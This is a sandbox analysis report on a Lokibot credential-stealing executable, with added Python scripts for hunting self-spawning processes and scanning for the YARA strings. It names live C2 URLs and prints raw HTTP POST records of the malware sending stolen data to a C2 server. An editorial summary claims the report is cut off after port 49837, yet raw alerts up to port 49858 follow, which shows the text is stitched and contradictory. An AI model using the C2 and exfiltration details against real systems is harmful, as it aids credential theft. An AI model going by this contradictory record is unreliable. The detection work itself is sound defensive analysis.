
Analysis Report Conan Fegan - Aluminium.exe

Overview

General Information

Sample Name: Conan Fegan - Aluminium.exe
Analysis ID: 356211
MD5: 708ee64939578fbb07010e20f6c7672c
SHA1: 335dc9a9142b528848b8446be2afda844f6d673f
SHA256: f1a43d8b49bda3c88eb1c314c9460a92c0b467ea8db4c9086ac8e3bfe358e511
Tags: Loki


Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via registry access)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • Conan Fegan - Aluminium.exe (PID: 4748 cmdline: 'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe' MD5: 708EE64939578FBB07010E20F6C7672C)
    • Conan Fegan - Aluminium.exe (PID: 7008 cmdline: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe MD5: 708EE64939578FBB07010E20F6C7672C)
  • cleanup
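The tree above shows the sample starting a second copy of itself from the same Desktop path; together with the "Creates a process in suspended mode" and PE-injection signatures further down, that is the usual self-hollowing pattern. The following is an example added by the editor, not Joe Sandbox output, that turns the pattern into a hunting check over Sysmon-style process-creation events. The parent of PID 4748 (explorer.exe, pid 1234) and the benign Chrome events are constructed; the report only shows the two sample processes.

```python
"""Hunt for a binary in a user-writable location that launches a copy of itself,
the self-spawn seen in the Startup section of this report.
Example code added by the editor; the events below are constructed."""
import ntpath

# Directories an ordinary user can write executables into. Assumption: tune per estate.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)

EVENTS = [
    # Constructed launcher: the report does not show who started PID 4748; pid 1234 is made up.
    {"pid": 4748, "ppid": 1234,
     "image": r"C:\Users\user\Desktop\Conan Fegan - Aluminium.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    # The child copy listed in the report's Startup section (PID 7008 under 4748).
    {"pid": 7008, "ppid": 4748,
     "image": r"C:\Users\user\Desktop\Conan Fegan - Aluminium.exe",
     "parent_image": r"C:\Users\user\Desktop\Conan Fegan - Aluminium.exe"},
    # Constructed benign control: a browser spawning a renderer from Program Files.
    {"pid": 5120, "ppid": 5100,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]


def is_user_writable(image: str) -> bool:
    """True when the image path sits under a directory a user can write to."""
    return image.lower().startswith(USER_WRITABLE_PREFIXES)


def find_self_spawn(events: list) -> list:
    """Return the events whose image equals the parent's image and lives in a
    user-writable path. Browsers and Electron apps also self-spawn, but from
    Program Files, so the path test keeps them out of the result."""
    return [
        e for e in events
        if ntpath.normcase(e["image"]) == ntpath.normcase(e["parent_image"])
        and is_user_writable(e["image"])
    ]


def process_tree(events: list) -> dict:
    """Map each parent pid to its child pids so a hit can be reported with its chain."""
    tree = {}
    for e in events:
        tree.setdefault(e["ppid"], []).append(e["pid"])
    return tree


if __name__ == "__main__":
    for hit in find_self_spawn(EVENTS):
        print(f"self-spawn: pid {hit['pid']} <- ppid {hit['ppid']} {hit['image']}")
    print("children of 4748:", process_tree(EVENTS).get(4748, []))
```

The check only fires on the 7008 event; the Chrome pair is excluded by the path test, not by the image name, so a renamed sample dropped into a user directory is still caught.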

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://www.ritcophysiotherapy.com.au/wap121/five/fre.php"]}

Yara Overview

PCAP (Network Traffic)

Source: dump.pcap
  Rule: JoeSecurity_Lokibot_1 (Yara detected Lokibot); Author: Joe Security

Memory Dumps

Source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp
  Rule: JoeSecurity_Lokibot_1 (Yara detected Lokibot); Author: Joe Security
Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp
  Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer); Author: Joe Security
  Rule: JoeSecurity_aPLib_compressed_binary (Yara detected aPLib compressed binary); Author: Joe Security
  Rule: JoeSecurity_Lokibot (Yara detected Lokibot); Author: Joe Security
  Rule: Lokibot (detect Lokibot in memory); Author: JPCERT/CC Incident Response Group
    Strings (3 of 16 matches shown):
    • 0x1d6f8f: $des3: 68 03 66 00 00
    • 0x1db380: $param: MAC=%02X%02X%02XINSTALL=%08X%08X
    • 0x1db44c: $string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Unpacked PEs

Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack
  Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer); Author: Joe Security
  Rule: JoeSecurity_aPLib_compressed_binary (Yara detected aPLib compressed binary); Author: Joe Security
  Rule: JoeSecurity_Lokibot (Yara detected Lokibot); Author: Joe Security
  Rule: Loki_1 (Loki Payload); Author: kevoreilly
    Strings:
    • 0xa3864: $a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
    • 0xa3aac: $a2: last_compatible_version
  Rule: Lokibot (detect Lokibot in memory); Author: JPCERT/CC Incident Response Group
    Strings (3 of 30 matches shown):
    • 0xa2aaf: $des3: 68 03 66 00 00
    • 0xa6ea0: $param: MAC=%02X%02X%02XINSTALL=%08X%08X
    • 0xa6f6c: $string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
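The rule tables above give the matched strings and, for the JPCERT/CC rule, their offsets in both the memory dump and the unpacked PE. The following is an example added by the editor (not Joe Sandbox code, and not the JPCERT/CC or kevoreilly rules themselves): it re-checks those same strings in an arbitrary dump with nothing but the standard library, and shows that the two offset sets in the report describe the same payload image at two different bases. The filler image it builds for the demo is constructed; reading 68 03 66 00 00 as a push of CryptoAPI's CALG_3DES constant is the editor's annotation.

```python
"""Check a memory dump or unpacked PE for the Lokibot string indicators that the
YARA rules in this report matched on, using the standard library only.
Example code added by the editor; it is not Joe Sandbox code and it is not the
JPCERT/CC or kevoreilly rules, only the specific strings they reported."""
import re
import sys

# Indicators transcribed from the rule matches above.
INDICATORS = {
    # 68 03 66 00 00 is "push 0x6603"; 0x6603 is CryptoAPI's CALG_3DES, hence the name $des3.
    "jpcert_des3":   bytes.fromhex("68 03 66 00 00"),
    "jpcert_param":  b"MAC=%02X%02X%02XINSTALL=%08X%08X",
    # 2D 00 75 00 00 00 followed by "Fuckav.ru\0\0" (the hex bytes decoded).
    "jpcert_string": bytes.fromhex("2D 00 75 00 00 00") + b"Fuckav.ru\x00\x00",
    "loki1_a1":      b"DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW",
    "loki1_a2":      b"last_compatible_version",
}

# Offsets exactly as printed in the report for the two JPCERT/CC matches.
REPORT_OFFSETS = {
    "memory_dump": {"jpcert_des3": 0x1d6f8f, "jpcert_param": 0x1db380, "jpcert_string": 0x1db44c},
    "unpacked_pe": {"jpcert_des3": 0xa2aaf,  "jpcert_param": 0xa6ea0,  "jpcert_string": 0xa6f6c},
}


def relative_layout(offsets: dict) -> dict:
    """Express every offset relative to the lowest one, so two copies of the same
    payload mapped at different bases compare equal."""
    base = min(offsets.values())
    return {name: off - base for name, off in offsets.items()}


def scan(blob: bytes) -> dict:
    """Return {indicator_name: [offsets]} for each indicator present in blob."""
    hits = {}
    for name, pattern in INDICATORS.items():
        offsets = [m.start() for m in re.finditer(re.escape(pattern), blob)]
        if offsets:
            hits[name] = offsets
    return hits


def is_lokibot(hits: dict, min_indicators: int = 2) -> bool:
    """Require more than one indicator, so a lone 'last_compatible_version'
    string in an unrelated binary does not produce a verdict."""
    return len(hits) >= min_indicators


def build_sample_blob() -> bytes:
    """Constructed test image (not malware): 0x90 filler with the three JPCERT/CC
    strings placed at the relative positions the unpacked-PE match reports."""
    layout = relative_layout(REPORT_OFFSETS["unpacked_pe"])
    buf = bytearray(b"\x90" * (max(layout.values()) + 64))
    for name, off in layout.items():
        buf[off:off + len(INDICATORS[name])] = INDICATORS[name]
    return bytes(buf)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    hits = scan(data)
    for name, offs in hits.items():
        print(f"{name:15s} at {', '.join(hex(o) for o in offs)}")
    print("verdict:", is_lokibot(hits))
    same = relative_layout(REPORT_OFFSETS["memory_dump"]) == relative_layout(REPORT_OFFSETS["unpacked_pe"])
    print("report's memory dump and unpacked PE share one layout:", same)
```

Run it with a dump path to scan a real file, or with no argument to run on the constructed image. The layout comparison is worth keeping: in both of the report's sources $param sits 0x43F1 bytes after $des3 and $string a further 0xCC bytes on, which is what you expect when the 00000000.* memory region and the 0.2.*.unpack file are the same decompressed payload.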

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Conan Fegan - Aluminium.exe; Avira: detected
Found malware configuration
Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp; Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://www.ritcophysiotherapy.com.au/wap121/five/fre.php"]}
Machine Learning detection for sample
Source: Conan Fegan - Aluminium.exe; Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: Conan Fegan - Aluminium.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Conan Fegan - Aluminium.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW 5_2_00403D74 (directory enumeration in process index 5, the same process as the 00000005.* memory dump above; its signature heading is missing from the extracted report)
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_07A3DE28
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: 4x nop then jmp 07A3C2B3h 0_2_07A3C1FF
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_07A3DF24

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic. Every alert is for 192.168.2.4 (the analysis VM) -> 203.170.84.89:80, i.e. plain HTTP to one C2 endpoint. The report prints three alerts per connection, one line each; they are grouped here by Snort SID with the source port of every connection kept.

SID 2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
  Source ports: 49745, 49747 (2 alerts)

SID 2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1
  Source ports: 49749-49760, 49763-49774, 49777, 49781, 49784, 49788, 49790, 49792-49800, 49804, 49805, 49811-49835, 49837 (66 alerts)

SID 2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)
  One alert on each of the 68 connections above: 49745, 49747 and the 66 command-request ports

SID 2025381  ET TROJAN LokiBot Checkin
  One alert on each of those connections except 49837 (67 alerts)

As the rule names indicate, the first two connections carried the stolen data and every later connection was a poll for C2 commands. The extracted report is cut off after the 2021641 alert for port 49837; the 2025381 alert for that connection and all later sections are not present.
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49858 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49858 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49858 -> 203.170.84.89:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractor | URLs: https://www.ritcophysiotherapy.com.au/wap121/five/fre.php
                  Source: Joe Sandbox View | ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
